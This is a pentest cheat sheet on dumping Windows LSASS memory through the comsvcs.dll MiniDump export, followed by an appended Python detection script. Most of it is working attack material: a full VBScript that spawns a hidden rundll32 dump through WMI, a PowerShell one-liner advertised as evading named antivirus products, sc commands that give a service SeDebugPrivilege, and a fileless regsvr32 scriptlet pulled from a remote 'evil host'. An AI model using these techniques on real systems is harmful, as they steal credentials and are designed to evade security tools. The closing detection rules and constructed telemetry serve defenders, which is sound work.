Windows Memory Dump Cheatsheet
Procdump is painful as most AV software now catches it.
The below cheat-sheet can be useful during memory forensics or pentests!
Method #1 — Using CSCRIPT
Since neither rundll32 nor comsvcs!MiniDumpW will enable the debug privilege required to access lsass.exe, the following VBScript does it by connecting to WMI with the Debug privilege; it will work from an elevated process.
Option Explicit

Const SW_HIDE = 0

If (WScript.Arguments.Count <> 1) Then
  WScript.StdOut.WriteLine("procdump - Copyright (c) 2019 odzhan")
  WScript.StdOut.WriteLine("Usage: procdump <process>")
  WScript.Quit
Else
  Dim fso, svc, list, proc, startup, cfg, pid, str, cmd, query, dmp

  ' get process id or name
  pid = WScript.Arguments(0)

  ' connect with debug privilege
  Set fso = CreateObject("Scripting.FileSystemObject")
  Set svc = GetObject("WINMGMTS:{impersonationLevel=impersonate, (Debug)}")

  ' if not a number, search by name instead of by process id
  If (Not IsNumeric(pid)) Then
    query = "Name"
  Else
    query = "ProcessId"
  End If

  ' try to find it
  Set list = svc.ExecQuery("SELECT * From Win32_Process Where " & _
    query & " = '" & pid & "'")

  If (list.Count = 0) Then
    WScript.StdOut.WriteLine("Can't find active process : " & pid)
    WScript.Quit()
  End If

  ' take the first match
  For Each proc in list
    pid = proc.ProcessId
    str = proc.Name
    Exit For
  Next

  dmp = fso.GetBaseName(str) & ".bin"

  ' if dump file already exists, try to remove it
  If (fso.FileExists(dmp)) Then
    WScript.StdOut.WriteLine("Removing " & dmp)
    fso.DeleteFile(dmp)
  End If

  WScript.StdOut.WriteLine("Attempting to dump memory from " & _
    str & ":" & pid & " to " & dmp)

  ' spawn rundll32 through WMI (Win32_Process.Create) with a hidden window
  Set proc = svc.Get("Win32_Process")
  Set startup = svc.Get("Win32_ProcessStartup")
  Set cfg = startup.SpawnInstance_
  cfg.ShowWindow = SW_HIDE

  cmd = "rundll32 C:\windows\system32\comsvcs.dll, MiniDump " & _
    pid & " " & fso.GetAbsolutePathName(".") & "\" & _
    dmp & " full"

  Call proc.Create(cmd, null, cfg, pid)

  ' sleep for a second so the dump has time to be written
  WScript.Sleep(1000)

  If (fso.FileExists(dmp)) Then
    WScript.StdOut.WriteLine("Memory saved to " & dmp)
  Else
    WScript.StdOut.WriteLine("Something went wrong.")
  End If
End If
Run it from an elevated command prompt.
Most EDR products will still block this.
Method #2 — Using PowerShell or CMD
Powershell -c rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump [process ID of process.exe] dump.bin full
Bypasses some common antiviruses such as Sophos Antivirus, KAV etc.
Method #3 — Using SC
Administrative users can use the Windows Service Control to create a service that runs our command, assign debug privileges to that service, and then run it. The following commands can be run from an elevated command prompt to create a MiniDump of LSASS:
- sc create test binpath="rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump [process ID of process.exe] dump.bin full"
- sc privs test SeDebugPrivilege
- sc start test
Method #4 — Using regsvr32
The following .sct scriptlet is hosted on your evil host.
Remember to change <procid> to the target process ID.
<?XML version="1.0"?>
<scriptlet>
<registration
  progid="Pentest"
  classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("cmd /k Powershell -c rundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump <procid> lsadump.bin full");
]]>
</script>
</registration>
</scriptlet>
This can be made fully fileless by passing a URL to /i, leaving few traces; Windows Event Viewer would only show that wscript.exe was executed.
regsvr32 /s /n /u /i:http://192.168.200.200/dumper.sct scrobj.dll
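As an added defender-side example (not part of the original cheatsheet), the following Python script runs simple detection rules over constructed process-creation records and covers the command lines shown in Methods #1 to #4 at once: rundll32 loading comsvcs.dll MiniDump, sc create / sc privs building a service with SeDebugPrivilege, and regsvr32 fetching a remote scriptlet with scrobj.dll. The sample records, the PID 624 and the rule names are constructed assumptions; the parent-process enrichment relies on the fact that processes started through WMI's Win32_Process.Create (the VBScript in Method #1) have WmiPrvSE.exe as their parent.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    """Minimal process-creation record (e.g. Sysmon Event ID 1 / Security 4688)."""
    image: str
    command_line: str
    parent_image: str


# Detection rules keyed on the new process's command line.
# Patterns are case-insensitive because cmd.exe, rundll32 and sc are.
RULES = {
    # Methods #1-#3: rundll32 invoking the MiniDump export of comsvcs.dll
    "comsvcs_minidump": re.compile(
        r"comsvcs\.dll\s*,\s*MiniDump\b", re.I),
    # Method #3: a service whose binary path is that same MiniDump command
    "sc_service_minidump": re.compile(
        r"\bsc(\.exe)?\s+create\s+.*comsvcs\.dll.*MiniDump", re.I),
    # Method #3: SeDebugPrivilege handed to a service through sc privs
    "sc_debug_privilege": re.compile(
        r"\bsc(\.exe)?\s+privs\s+\S+\s+.*SeDebugPrivilege", re.I),
    # Method #4: regsvr32 pulling a remote scriptlet via /i:<url> with scrobj.dll
    "regsvr32_remote_scriptlet": re.compile(
        r"\bregsvr32(\.exe)?\b.*/i:https?://.*scrobj\.dll", re.I),
}


def evaluate(events):
    """Return one finding dict per (event, matching rule) pair."""
    findings = []
    for ev in events:
        for rule, pattern in RULES.items():
            if pattern.search(ev.command_line):
                findings.append({
                    "rule": rule,
                    "image": ev.image,
                    "command_line": ev.command_line,
                    # Win32_Process.Create spawns the child under WmiPrvSE.exe,
                    # which distinguishes the WMI-driven variant (Method #1).
                    "via_wmi": ev.parent_image.lower().endswith("wmiprvse.exe"),
                })
    return findings


def rule_counts(findings):
    """Aggregate findings into {rule_name: hit_count}."""
    counts = {}
    for f in findings:
        counts[f["rule"]] = counts.get(f["rule"], 0) + 1
    return counts


# Constructed sample telemetry (not real logs); 624 is a made-up PID.
SAMPLE_EVENTS = [
    # Method #1: rundll32 spawned by WMI from the VBScript
    ProcessEvent(r"C:\Windows\System32\rundll32.exe",
                 r"rundll32 C:\windows\system32\comsvcs.dll, MiniDump 624 C:\Users\Public\lsass.bin full",
                 r"C:\Windows\System32\wbem\WmiPrvSE.exe"),
    # Method #2: PowerShell one-liner
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"Powershell -c rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 624 dump.bin full",
                 r"C:\Windows\System32\cmd.exe"),
    # Method #3: service creation and privilege assignment
    ProcessEvent(r"C:\Windows\System32\sc.exe",
                 r'sc create test binpath="rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 624 dump.bin full"',
                 r"C:\Windows\System32\cmd.exe"),
    ProcessEvent(r"C:\Windows\System32\sc.exe",
                 r"sc privs test SeDebugPrivilege",
                 r"C:\Windows\System32\cmd.exe"),
    # Method #4: regsvr32 with a remote scriptlet
    ProcessEvent(r"C:\Windows\System32\regsvr32.exe",
                 r"regsvr32 /s /n /u /i:http://192.168.200.200/dumper.sct scrobj.dll",
                 r"C:\Windows\System32\cmd.exe"),
    # Benign activity that must not fire
    ProcessEvent(r"C:\Windows\System32\rundll32.exe",
                 r"rundll32.exe shell32.dll,Control_RunDLL",
                 r"C:\Windows\explorer.exe"),
    ProcessEvent(r"C:\Windows\System32\regsvr32.exe",
                 r"regsvr32 /s C:\Program Files\Vendor\plugin.dll",
                 r"C:\Windows\System32\msiexec.exe"),
]


if __name__ == "__main__":
    for f in evaluate(SAMPLE_EVENTS):
        tag = " (via WMI)" if f["via_wmi"] else ""
        print(f'[{f["rule"]}]{tag} {f["image"]}: {f["command_line"]}')
    print(rule_counts(evaluate(SAMPLE_EVENTS)))
```

Run against the constructed records, the five malicious command lines produce six findings (the sc create line matches both the comsvcs rule and the service rule) and the two benign lines produce none; in a real pipeline the same regexes would be applied to the CommandLine field of each process-creation event, with the WmiPrvSE.exe parent check used to raise the severity of the WMI-driven variant.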